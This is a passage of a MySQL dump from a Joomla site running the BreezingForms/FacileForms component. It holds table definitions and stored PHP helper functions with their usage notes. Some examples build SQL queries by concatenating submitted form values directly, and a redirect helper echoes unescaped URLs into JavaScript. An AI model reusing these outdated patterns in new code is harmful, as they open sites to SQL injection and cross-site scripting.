script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle4\",\"name\":\"bfFakeName4\",\"page\":1,\"orderNumber\":0,\"dbId\":33,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"}],\"elementCount\":5}]',0,1,0,'Contact','','','Contact','','',NULL,400,0,500,0,2,2,1,1,1,0,0,0,0,NULL,NULL,0,0,'info@dashlogic.co.za',1,0,NULL,NULL,2,NULL,'function ff_Contact_submitted(status, message){if(status==0){ff_switchpage(2);}else{alert(message);}}',0,NULL,NULL,0,NULL,NULL,0,NULL,NULL,0,NULL,NULL,2,NULL,'');
/*!40000 ALTER TABLE `atlyh_facileforms_forms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_integrator_criteria_fixed`
--
DROP TABLE IF EXISTS `atlyh_facileforms_integrator_criteria_fixed`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_integrator_criteria_fixed` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`fixed_value` text NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_integrator_criteria_fixed`
--
LOCK TABLES `atlyh_facileforms_integrator_criteria_fixed` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_fixed` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_fixed` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_integrator_criteria_form`
--
DROP TABLE IF EXISTS `atlyh_facileforms_integrator_criteria_form`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_integrator_criteria_form` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`element_id` varchar(255) NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_integrator_criteria_form`
--
LOCK TABLES `atlyh_facileforms_integrator_criteria_form` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_form` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_form` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_integrator_criteria_joomla`
--
DROP TABLE IF EXISTS `atlyh_facileforms_integrator_criteria_joomla`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_integrator_criteria_joomla` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`joomla_object` varchar(255) NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_integrator_criteria_joomla`
--
LOCK TABLES `atlyh_facileforms_integrator_criteria_joomla` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_joomla` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_criteria_joomla` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_integrator_items`
--
DROP TABLE IF EXISTS `atlyh_facileforms_integrator_items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_integrator_items` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`element_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`code` text NOT NULL,
`published` tinyint(4) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_integrator_items`
--
LOCK TABLES `atlyh_facileforms_integrator_items` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_items` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_integrator_rules`
--
DROP TABLE IF EXISTS `atlyh_facileforms_integrator_rules`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_integrator_rules` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`form_id` int(11) NOT NULL,
`reference_table` varchar(255) NOT NULL,
`type` varchar(255) NOT NULL DEFAULT 'insert',
`published` tinyint(1) NOT NULL DEFAULT 1,
`finalize_code` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_integrator_rules`
--
LOCK TABLES `atlyh_facileforms_integrator_rules` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_rules` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_facileforms_integrator_rules` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_packages`
--
DROP TABLE IF EXISTS `atlyh_facileforms_packages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_packages` (
`id` varchar(30) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`version` varchar(30) NOT NULL DEFAULT '',
`created` varchar(20) NOT NULL DEFAULT '',
`title` varchar(50) NOT NULL DEFAULT '',
`author` varchar(50) NOT NULL DEFAULT '',
`email` varchar(50) NOT NULL DEFAULT '',
`url` varchar(50) NOT NULL DEFAULT '',
`description` varchar(100) NOT NULL DEFAULT '',
`copyright` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_packages`
--
LOCK TABLES `atlyh_facileforms_packages` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_packages` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_packages` VALUES ('','mypck_001','0.0.1','2005-07-31 22:21:23','My First Package','My Name','my.name@my.domain','http://www.my.domain','This is the first package that I created','This FacileForms package is released under the GNU/GPL license'),('FF','stdlib.english','1.8','2012-09-21 11:50:15','BreezingForms-Standard Piece and Script Libraries','Markus Bopp','markus.bopp@crosstec.org','https://crosstec.org','These are the standard BreezingForms script and piece libraries.','This BreezingForms package is released under the GNU/GPL license');
/*!40000 ALTER TABLE `atlyh_facileforms_packages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_pieces`
--
DROP TABLE IF EXISTS `atlyh_facileforms_pieces`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_pieces` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`published` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`type` varchar(30) NOT NULL DEFAULT '',
`code` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_pieces`
--
LOCK TABLES `atlyh_facileforms_pieces` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_pieces` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_pieces` VALUES (1,1,'FF','ff_addCustomCSSFile','Add custom CSS File','Adds a custom css file to the form. To choose a css file, execute this piece and call the function ff_addCustomCSSFile(\'path/to/css/file\') with the RELATIVE (not full!) path to your joomla installation.\r\nDo not forget to call $this->execPieceByName(\'ff_InitLib\') before!\r\n\r\nExample:\r\n\r\nglobal $mainframe;\r\n\r\n$this->execPieceByName(\'ff_InitLib\');\r\n$this->execPieceByName(\'ff_addCustomCSSFile\');\r\n\r\nff_addCustomCSSFile(\'templates/\' . $mainframe->getTemplate() . \'/css/template.css\');','Before Form','function ff_addCustomCSSFile($path){\r\n if(file_exists(JPATH_SITE . \'/\' . $path)){\r\n JFactory::getDocument()->addStyleSheet(JURI::root() . $path);\r\n }\r\n}'),(2,1,'FF','ff_Constants','Constansts definitions','Library constants definitions','Before Form','define(\'FF_DIE\', \'_ff_die_on_errors_\');\r\ndefine(\'FF_DONTDIE\', \'_ff_stay_alive_\');\r\ndefine(\'FF_IGNOREDIE\', \'_ff_ignore_if_dying_\');\r\n\r\ndefine(\'FF_ARRAY\', \'_ff_return_as_array_\');\r\ndefine(\'FF_LIST\', \'_ff_return_as_list_\');\r\ndefine(\'FF_SLIST\', \'_ff_return_as_slist_\');\r\ndefine(\'FF_DLIST\', \'_ff_return_as_dlist_\');\r\n\r\ndefine(\'FF_NOTRIM\', 1);\r\ndefine(\'FF_ALLOWHTML\', 2);\r\ndefine(\'FF_ALLOWRAW\', 4);'),(3,1,'FF','ff_die','Terminate form gracefully','Gracefully terminates the form and shows a message plus opionally a \r\nCONTINUE button for further redirection.\r\n\r\nCall:\r\n\r\n ff_die($message=null, $action=\'stop\', $target=\'\', $params=\'\', $label=\'Continue\');\r\n return;\r\n\r\n $message = A message to display. If no message is provided, it will\r\n display:\r\n\r\n Fatal error in $formname, processing stopped.\r\n\r\n $action = \'stop\' : Dont show a CONTINUE button (default)\r\n \'self\' : Redirect to the same form\r\n \'form\' : Redirect to another form \r\n \'page\' : Redirect to another page of this site\r\n \'home\' : Redirect to homepage of the site\r\n \'url\' : Redirect to a url\r\n\r\n $target = Target name/url for \'form\', \'page\' and \'url\'\r\n\r\n $params = Additional parameters for \'self\' and \'form\'\r\n\r\n $label = Text for the continue button\r\n\r\nExamples:\r\n\r\n // Display standard message without continue button\r\n ff_die(); \r\n\r\n // Display message without continue button\r\n ff_die(\'Sorry, cannot continue for some reason.\');\r\n\r\n // Display standard message and return to same form with a parameter\r\n ff_die(null, \'self\', \'&ff_param_foo=bar\');\r\n\r\n // Redirect to another form\r\n ff_die(\'Guess you are hungry now...\', \'form\', \'SamplePizzaShop\', null, \'Order\');\r\n\r\n // Redirect to another site page\r\n ff_die(\r\n \'Something strange has happened!\', \r\n \'page\', \r\n \'index.php?option=com_content&task=section&id=1&Itemid=2\'\r\n );','Untyped','function ff_die($message=\'\', $action=\'stop\', $target=\'\', $params=\'\', $label=\'Continue\')\r\n{\r\n global $ff_processor;\r\n if ($ff_processor->dying) return;\r\n\r\n ob_end_clean();\r\n $form =& $ff_processor->formrow;\r\n if (!$message) \r\n $message = \r\n \"<strong>Fatal error in $form->name, form processing halted.</strong>\";\r\n switch ($action) {\r\n case \'self\': $url = ff_makeSelfUrl($params); break;\r\n case \'form\': $url = ff_makeFormUrl($target, $params); break;\r\n case \'page\': $url = ff_makePageUrl($target); break;\r\n case \'home\': $url = \"{mossite}\"; break;\r\n case \'url\' : $url = $target; break;\r\n default : $url = \'\';\r\n } // switch\r\n if ($form->class1 != \'\') echo \'<div class=\"\'.$form->class1.\'\">\'.nl();\r\n echo($message.\'<br/><br/><br/>\'.nl());\r\n if ($url) {\r\n if (!$ff_processor->inline) echo \'<form action=\"#redirect\">\'.nl();\r\n if ($ff_processor->inframe) $t = \'parent\'; else $t = \'document\';\r\n echo \'<input type=\"button\" class=\"button\" value=\"\'.$label.\'\"\'.\r\n \' onClick=\"\'.$t.\'.location.href=\\\'\'.htmlentities($url,ENT_QUOTES).\'\\\';\"\'.\r\n \'/>\'.nl();\r\n if (!$ff_processor->inline) echo \'</form>\'.nl();\r\n } // if\r\n if ($form->class1 != \'\') echo \'</div>\'.nl();\r\n unset($form);\r\n ob_start();\r\n $ff_processor->suicide();\r\n} // ff_die'),(4,1,'FF','ff_DisableFormTrace','Disable tracing at view time','Disables tracing for use as before form piece','Before Form','//+trace dis'),(5,1,'FF','ff_DisableSubmitTrace','Disable tracing at submit time','Disables tracing for use as begin submit piece','Begin Submit','//+trace dis'),(6,1,'FF','ff_dying','Query live status','Query if form is dying','Untyped','//+trace max none\r\nfunction ff_dying()\r\n{\r\n global $ff_processor; \r\n return $ff_processor->dying;\r\n} // ff_dying'),(7,1,'FF','ff_expString','String export','Export string function: escapes special characters in c-codes','Untyped','function ff_expString($text)\r\n{\r\n return expstring($text);\r\n} // ff_expString'),(8,1,'FF','ff_getPageByNameX','Get page # by element name','Gets the page number by the name of an element. \r\nTypically used to redirect to a certain page in a before form piece \r\nas \r\n\r\n $this->page = ff_getPageByName(\'elementname\');','Untyped','function ff_getPageByName($name)\r\n{\r\n global $ff_processor;\r\n foreach($ff_processor->rows as $row)\r\n if ($row->name==$name)\r\n return $row->page;\r\n return null;\r\n} // ff_getPageByName'),(9,1,'FF','ff_getParam','Get GET/POST parameter','Direct replacement for mosGetParam. ff_getParam will attempt to filter \r\nout parameters that are targeted to another form on the same page.','Untyped','function ff_getParam($name, $default=null, $mask=0)\r\n{\r\n global $ff_request;\r\n if (substr($name,0,9)==\'ff_param_\') {\r\n if (!isset($ff_request[$name])) return $default;\r\n $val = $ff_request[$name];\r\n } else {\r\n if (!isset($_REQUEST[$name])) return $default;\r\n $val = $_REQUEST[$name];\r\n } // if\r\n $dotrim = ($mask & FF_NOTRIM)==0;\r\n $dostrp = ($mask & FF_ALLOWHTML)==0;\r\n $addsla = ($mask & FF_ALLOWRAW)==0 && !get_magic_quotes_gpc();\r\n $remsla = ($mask & FF_ALLOWRAW)!=0 && get_magic_quotes_gpc();\r\n if (is_array($val)) {\r\n $cnt = count($val);\r\n for ($v = 0; $v < $cnt; $v++)\r\n if (is_string($val[$v])) {\r\n if ($dotrim) $val[$v] = trim($val[$v]);\r\n if ($dostrp) $val[$v] = strip_tags($val[$v]);\r\n if ($addsla) $val[$v] = addslashes($val[$v]);\r\n if ($remsla) $val[$v] = stripslashes($val[$v]);\r\n } // if\r\n } else {\r\n if (is_string($val)) {\r\n if ($dotrim) $val = trim($val);\r\n if ($dostrp) $val = strip_tags($val);\r\n if ($addsla) $val = addslashes($val);\r\n if ($remsla) $val = stripslashes($val);\r\n } // if\r\n } // if\r\n return $val;\r\n} // ff_getParam'),(10,1,'FF','ff_getSubmit','Get submited data','Returns submitdata either as scalar, array or list. In case of list the values\r\nare returned as a string with the values concatenated by comma.\r\n\r\nExamples:\r\n\r\n// Get as scalar: Optionally pass a default value as second parameter.\r\n// If no default is provided, it will return NULL if no value was submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\'); // return NULL if not submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\',1); // return 1 if not submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\',\'foo\'); // return \'foo\' if not submitted\r\n\r\n ff_query(\r\n \"insert into #__mytable(id, name) \".\r\n \"values (\'\".\r\n ff_getSubmit(\'id\').\", \".\r\n ff_getSubmit(\'name\',\'unknown\').\r\n \"\')\"\r\n );\r\n\r\n// Get as array: Pass FF_ARRAY as second Parameter\r\n\r\n $myarr = $ff_getSubmit(\'myarr\', FF_ARRAY);\r\n\r\n foreach ($myarr as $myval) ...\r\n\r\n// Get as list: Pass either FF_LIST, FF_SLIST or FF_DLIST as 2nd parameter.\r\n\r\n // FF_LIST will return numeric data unquoted and strings in single quotes:\r\n // 1,2,\'a\',4\r\n\r\n // FF_SLIST will return all data single quoted:\r\n // \'1\',\'2\',\'a\',\'4\'\r\n\r\n // FF_DLIST will return all data double quoted:\r\n // \"1\",\"2\",\"a\",\"4\"\r\n\r\n ff_query(\r\n \"delete from #__mytable \".\r\n \"where id in (\".ff_getSubmit(\'itemlist\',FF_LIST).\")\"\r\n );','Untyped','function ff_getSubmit($name, $default=null)\r\n{\r\n global $ff_processor;\r\n\r\n switch ((string)$default) {\r\n case FF_ARRAY: $value = array(); break;\r\n case FF_LIST : \r\n case FF_SLIST:\r\n case FF_DLIST: $value = \'\'; break;\r\n default : $value = $default;\r\n } // switch\r\n foreach ($ff_processor->submitdata as $data)\r\n if ($data[_FF_DATA_NAME]==$name) {\r\n $q = \'\';\r\n switch ((string)$default) {\r\n case FF_ARRAY:\r\n $value[] = $data[_FF_DATA_VALUE];\r\n break;\r\n case FF_SLIST:\r\n $q = \"\'\";\r\n case FF_DLIST:\r\n if ($q==\'\') $q = \'\"\';\r\n case FF_LIST:\r\n if ($q==\'\' && !is_numeric($data[_FF_DATA_VALUE])) $q = \"\'\";\r\n if ($value!=\'\') $value.=\',\';\r\n $value .= $q.$data[_FF_DATA_VALUE].$q;\r\n break;\r\n default:\r\n return $data[_FF_DATA_VALUE];\r\n } // switch\r\n } // if\r\n return $value;\r\n} // ff_getSubmit'),(11,1,'FF','ff_impString','String import','Import string function: unescapes c-coded characters of a string','Untyped','function ff_impString($text)\r\n{\r\n return impstring($text);\r\n} // ff_impString'),(12,1,'FF','ff_InitLib','Init Library','A collection of useful functions for use in form pieces. \r\n\r\nInclude by: \r\n\r\n $this->execPieceByName(\'ff_InitLib\');','Before Form','//+trace high none\r\nif (!defined(\'FF_DIE\')) $this->execPieceByName(\'ff_Constants\');\r\nif (!function_exists(\'ff_expstring\')) $this->execPieceByName(\'ff_expstring\');\r\nif (!function_exists(\'ff_makePageUrl\')) $this->execPieceByName(\'ff_makePageUrl\');\r\nif (!function_exists(\'ff_makeFormUrl\')) $this->execPieceByName(\'ff_makeFormUrl\');\r\nif (!function_exists(\'ff_makeSelfUrl\')) $this->execPieceByName(\'ff_makeSelfUrl\');\r\nif (!function_exists(\'ff_die\')) $this->execPieceByName(\'ff_die\');\r\nif (!function_exists(\'ff_dying\')) $this->execPieceByName(\'ff_dying\');\r\nif (!function_exists(\'ff_redirect\')) $this->execPieceByName(\'ff_redirect\');\r\nif (!function_exists(\'ff_redirectParent\')) $this->execPieceByName(\'ff_redirectParentX\');\r\nif (!function_exists(\'ff_redirectPage\')) $this->execPieceByName(\'ff_redirectPage\');\r\nif (!function_exists(\'ff_redirectForm\')) $this->execPieceByName(\'ff_redirectForm\');\r\nif (!function_exists(\'ff_redirectSelf\')) $this->execPieceByName(\'ff_redirectSelf\');\r\nif (!function_exists(\'ff_setChecked\')) $this->execPieceByName(\'ff_setCheckedX\');\r\nif (!function_exists(\'ff_setSelected\')) $this->execPieceByName(\'ff_setSelectedX\');\r\nif (!function_exists(\'ff_setValue\')) $this->execPieceByName(\'ff_setValueX\');\r\nif (!function_exists(\'ff_getPageByName\')) $this->execPieceByName(\'ff_getPageByNameX\');\r\nif (!function_exists(\'ff_getParam\')) $this->execPieceByName(\'ff_getParam\');\r\nif (!function_exists(\'ff_getSubmit\')) $this->execPieceByName(\'ff_getSubmit\');\r\nif (!function_exists(\'ff_impString\')) $this->execPieceByName(\'ff_impString\');\r\nif (!function_exists(\'ff_expString\')) $this->execPieceByName(\'ff_expString\');\r\nif (!function_exists(\'ff_securityImage\')) $this->execPieceByName(\'ff_securityImage\');\r\nif (!function_exists(\'ff_select\')) $this->execPieceByName(\'ff_select\');\r\nif (!function_exists(\'ff_selectValue\')) $this->execPieceByName(\'ff_selectValue\');\r\nif (!function_exists(\'ff_query\')) $this->execPieceByName(\'ff_query\');\r\nif (!function_exists(\'ff_markdown\')) $this->execPieceByName(\'ff_markdown\');'),(13,1,'FF','ff_makeFormUrl','Make URL to other form','Redirects to another facile form. \r\n\r\nCall: \r\n\r\n $url = ff_makeFormUrl($name, $params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makeFormUrl(\r\n \'OtherForm\', \r\n \'&ff_param_email=\'.urlencode($email)\r\n );','Untyped','function ff_makeFormUrl($name, $params=\'\')\r\n{\r\n global $ff_processor, $ff_otherparams;\r\n $url = \'\';\r\n switch ($ff_processor->runmode) {\r\n case 2: // preview\r\n case 1: // backend\r\n $url .= \'administrator/index2.php?option=com_breezingforms&act=run\'.\r\n \'&ff_name=\'.urlencode($name);\r\n if ($ff_processor->inframe) $url .= \'&ff_frame=1\';\r\n if ($ff_processor->border) $url .= \'&ff_border=1\';\r\n break;\r\n default: // frontend\r\n $url .= \'index.php?ff_name=\'.urlencode($name);\r\n if ($ff_otherparams[\'option\'] == \'com_breezingforms\') {\r\n reset($ff_otherparams);\r\n while (list($prop, $val) = each($ff_otherparams))\r\n $url .= \'&\'.urlencode($prop).\'=\'.urlencode($val);\r\n } else\r\n $url .= \'&option=com_breezingforms\';\r\n if ($ff_processor->target > 1) $url .= \'&ff_target=\'.$ff_processor->target;\r\n if ($ff_processor->inframe) $url .= \'&ff_frame=1\';\r\n if ($ff_processor->border) $url .= \'&ff_border=1\';\r\n if ($ff_processor->align !=1) $url .= \'&ff_align=\'.$ff_processor->align;\r\n if ($ff_processor->top>0) $url .= \'&ff_top=\'.$ff_processor->top;\r\n } // switch\r\n return ff_makePageUrl($url. $params);\r\n} // ff_makeFormUrl'),(14,1,'FF','ff_makePageUrl','Make URL to other page','Builds an URL to another mambo page\r\n\r\nCall: \r\n\r\n $url = ff_makePageUrl($params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makePageUrl(\r\n \'index.php?option=com_content&task=blogsection&id=0&Itemid=39\'\r\n );','Untyped','function ff_makePageUrl($params=\'\')\r\n{\r\n $url = \'{mossite}\';\r\n if ($params != \'\') {\r\n $len = strlen($url);\r\n if ($len > 0 && $url{$len-1} != \'/\') $url .= \'/\';\r\n $url .= $params;\r\n } // if\r\n return $url;\r\n} // ff_makePageUrl'),(15,1,'FF','ff_makeSelfUrl','Make URL to same form','Make an URL to the same form. \r\n\r\nCall: \r\n\r\n $url = ff_makeSelfUrl($params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makeSelfUrl(\'&ff_param_email=\'.urlencode($email));','Untyped','function ff_makeSelfUrl($params=\'\')\r\n{\r\n global $ff_processor;\r\n return ff_makeFormUrl($ff_processor->formrow->name, $params);\r\n} // ff_makeSelfUrl'),(16,1,'FF','ff_query','Non-select queries against db','Execute a simple db query.\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_query\')) $this->execPieceByName(\'ff_query\');\r\n\r\nCall syntax:\r\n\r\n [$newid = ] ff_query($sql [, $insert = 0]);\r\n\r\n $sql: Sql statement to call\r\n $insert: 1 = return key of auto column when inserting rows\r\n $newid: The key of the new row.','Untyped','function ff_query($sql, $insert=false, $error=FF_DIE)\r\n{\r\n global $ff_processor;\r\n $database = JFactory::getDBO();\r\n if ($ff_processor->dying && $error!=FF_IGNOREDIE) return -1;\r\n $database->setQuery($sql);\r\n $database->query();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n if ($dienow) ff_die($error);\r\n } else {\r\n $error = null;\r\n if ($insert) return $database->insertid();\r\n } // if\r\n return 0;\r\n} // ff_query'),(17,1,'FF','ff_redirect','Basic redirection','Basic redirection routine supporting multiple targets and methods.\r\n\r\nCall:\r\n \r\nff_redirect($url [, $target=\'self\' , $method=\'post\'])\r\n\r\n $url = The url to redirect to including the parameters appended.\r\n\r\n $target = \'top\', \'parent\', \'self\' or \'blank\'\r\n\r\n \'top\' = redirect to the top browser window\r\n \'parent\' = redirect to the parent frame\r\n \'self\' = redirect in the same frame (the default)\r\n \'blank\' = redirect to a new browser window \r\n (blank works with post method only)\r\n\r\n $method = \'post\' or \'get\'. The default is \'post\'.\r\n\r\n Example:\r\n\r\n ff_redirect(\r\n \'http://mysite.net/index.php?option=xxx&Itemid=33\',\r\n \'top\'\r\n );','Untyped','function ff_redirect($url, $target=\'self\', $method=\'post\')\r\n{\r\n global $ff_processor, $ff_request;\r\n if ($ff_processor->dying) return;\r\n\r\n ob_end_clean();\r\n switch (strtolower($method)) {\r\n case \'get\': {\r\n switch (strtolower($target)) {\r\n case \'top\' :\r\n case \'parent\': break;\r\n default : $target = \'document\';\r\n } // switch\r\n echo \'<script type=\"text/javascript\">\'.nl().\r\n \'<!--\'.nl().\r\n \"onload=function() { \".$target.\".location.href=\'\".$url.\"\'; }\".nl().\r\n \'-->\'.nl().\r\n \'</script>\'.nl().\r\n \'</body>\'.nl();\r\n break;\r\n } // url\r\n default: { // post\r\n $pos = strpos($url,\'?\');\r\n $ff_request = array();\r\n if ($pos === false)\r\n $action = $url;\r\n else {\r\n $action = substr($url,0,$pos);\r\n addRequestParams(substr($url, $pos+1));\r\n } // if\r\n switch (strtolower($target)) {\r\n case \'blank\' : $target = \' target=\"_blank\"\'; break;\r\n case \'top\' : $target = \' target=\"_top\"\'; break;\r\n case \'parent\': $target = \' target=\"_parent\"\'; break;\r\n default : $target = \' target=\"_self\"\';\r\n } // switch\r\n echo \'<script language=\"javascript\" type=\"text/javascript\">\'.nl().\r\n \'<!--\'.nl().\r\n \'onload = function() { document.ff_redirect.submit(); }\'.nl().\r\n \'-->\'.nl().\r\n \'</script>\'.nl().\r\n \'<form action=\"\'.$action.\'\" \'.\r\n \'method=\"post\" \'.\r\n \'name=\"ff_redirect\" id=\"ff_redirect\" \'.\r\n \'enctype=\"multipart/form-data\"\'.\r\n $target.\r\n \'>\'.nl();\r\n while (list($prop, $val) = each($ff_request))\r\n echo \'<input type=\"hidden\" name=\"\'.$prop.\'\" \'.\r\n \'value=\"\'.htmlentities(urldecode($val)).\'\"/>\'.nl();\r\n echo \'</form>\'.nl().\r\n \'</body>\'.nl();\r\n } // post\r\n } // switch\r\n exit;\r\n} // ff_redirect'),(18,1,'FF','ff_redirectForm','Redirect to other form','Redirects to another facile form. \r\n\r\nCall: \r\n\r\n ff_redirectForm($name, $params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectForm(\r\n $this, \r\n \'SecondForm\', \r\n \'&ff_param_email=\'.urlencode($email)\r\n );','Untyped','function ff_redirectForm($name, $params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makeFormUrl($name, $params), $method);\r\n} // ff_redirectForm'),(19,1,'FF','ff_redirectPage','Redirect to other page','Redirects to another mambo page. \r\n\r\nCall: \r\n\r\n ff_redirectPage($params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectPage(\r\n \'index.php?option=com_content&task=blogsection&id=0&Itemid=39\'\r\n );','Untyped','function ff_redirectPage($params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makePageUrl($params), $method);\r\n} // ff_redirectPage'),(20,1,'FF','ff_redirectParentX','Redirect to parent window','Redirects to the parent window when runing in iframe, otherwise to self. \r\n\r\nff_redirectParent($url [, $method=\'post\'])\r\n\r\n $url = The url to redirect to including the parameters appended.\r\n\r\n $method = \'post\' or \'url\'. The default is \'post\'.\r\n\r\n Example:\r\n\r\n ff_redirectParent(\r\n \'http://mysite.net/index.php?option=xxx&Itemid=33\',\r\n \'url\'\r\n );','Untyped','function ff_redirectParent($url, $method = \'post\')\r\n{\r\n global $ff_processor;\r\n if ($ff_processor->inframe) $target = \'parent\'; else $target = \'self\'; \r\n ff_redirect($url, $target, $method);\r\n} // ff_redirectParent'),(21,1,'FF','ff_redirectSelf','Redirect to same form','Redirects to the same form. \r\n\r\nCall: \r\n\r\n ff_redirectSelf($params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectSelf(\'&ff_param_email=\'.urlencode($email));','Untyped','function ff_redirectSelf($params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makeSelfUrl($params), $method);\r\n} // ff_redirectSelf'),(22,1,'FF','ff_securityImage','Security Image','Create code to display the security image','Untyped','global $ff_seccode;\r\n\r\nif (!isset($this->record_id)) { $ff_seccode = null; }\r\n\r\nfunction ff_securityImage()\r\n{\r\n global $ff_comsite, $ff_seccode;\r\n if (!isset($ff_seccode)) { \r\n mt_srand((double)microtime()*1000000);\r\n $ff_seccode = mt_rand(10000, 99999);\r\n JFactory::getSession()->set(\'ff_seccode\', $ff_seccode);\r\n } // if\r\n\r\n return \'<img src=\"\'.JURI::root().\'ff_secimage.php?option=com_breezingforms&showSecImage=true\" title=\"\" alt=\"\" />\';\r\n} // ff_securityImage'),(23,1,'FF','ff_select','Select rows from db','Execute a select query\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_select\')) 